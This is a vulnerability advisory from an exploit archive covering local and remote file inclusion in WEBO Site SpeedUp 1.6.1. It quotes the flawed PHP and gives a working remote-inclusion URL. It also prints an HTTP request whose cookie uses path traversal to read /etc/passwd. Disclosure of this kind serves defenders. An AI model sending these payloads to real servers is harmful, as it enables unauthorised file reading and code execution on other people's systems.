exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WEBO Site SpeedUp 1.6.1 Local File Inclusion / Remote File Inclusion

WEBO Site SpeedUp 1.6.1 Local File Inclusion / Remote File Inclusion
Posted Jun 24, 2012
Authored by dun

WEBO Site SpeedUp versions 1.6.1 and below suffer from local file inclusion and remote file inclusion vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, file inclusion
SHA-256 | dbbeead6c82b71d756c0ca61fa554f3516d4601267dfee26551ae5dc6fcbfb75

WEBO Site SpeedUp 1.6.1 Local File Inclusion / Remote File Inclusion

Change Mirror Download

:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-06-16 ]
###############################################################
# [ WEBO Site SpeedUp <= 1.6.1 ] Multiple Vulnerabilities #
###############################################################
#
# Script: "WEBO Site SpeedUp is a PHP solution that automatically speeds your
# website up by combining and compressing your JavaScript and CSS assets..."
#
# Vendor: http://www.webogroup.com/home/
# Download: http://web-optimizator.googlecode.com/files/webo.site.speedup.v1.6.1.zip
#
# Bug: ./weboptimizer/index.php (lines: 7-21)
# ...
# $basepath = isset($basepath) ? $basepath : dirname(__FILE__) . '/'; // 1 [RFI]
#
# /* We need these */
# require($basepath . "controller/admin.php"); // 2 [RFI]
# require($basepath . "libs/php/view.php");
#
# /* include language file */
# $language = strtolower(preg_replace("/[-,;].*/", "", empty($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? 'en' : $_SERVER["HTTP_ACCEPT_LANGUAGE"]));
# $language = preg_replace("/[^a-z]/", "", $language);
# $language = str_replace(array('uk'), array('ua'), $language);
# if (!empty($_COOKIE['wss_lang'])) { // 1 [LFI]
# $language = strtolower($_COOKIE['wss_lang']); // 2 [LFI]
# }
# if (is_file($basepath . "libs/php/lang/" . $language . ".php")) { //
# require($basepath . "libs/php/lang/" . $language . ".php"); // 3 [LFI]
# } else {
# require($basepath . "libs/php/lang/en.php");
# }
# ...

[RFI] Vuln: ( allow_url_include = On; register_globals = On; )

http://localhost/weboptimizer/index.php?basepath=http://localhost/phpinfo.txt?

[LFI] Vuln: ( magic_quotes_gpc = Off; )

GET /weboptimizer/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/weboptimizer/
Cookie: wss_blocks=wss_toolswss_linkswss_newswss_syswss_updates; wss_lang=../../../../../../etc/passwd%00

HTTP/1.1 200 OK
Server: Apache
Date: Fri, 14 Jun 2012 22:29:39 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Expires: Sat, 16 Jun 2012 03:29:39 +0400
Cache-Control: no-store, no-cache, must-revalidate, private
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 2099

### [ dun / 2012 ] #####################################################
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close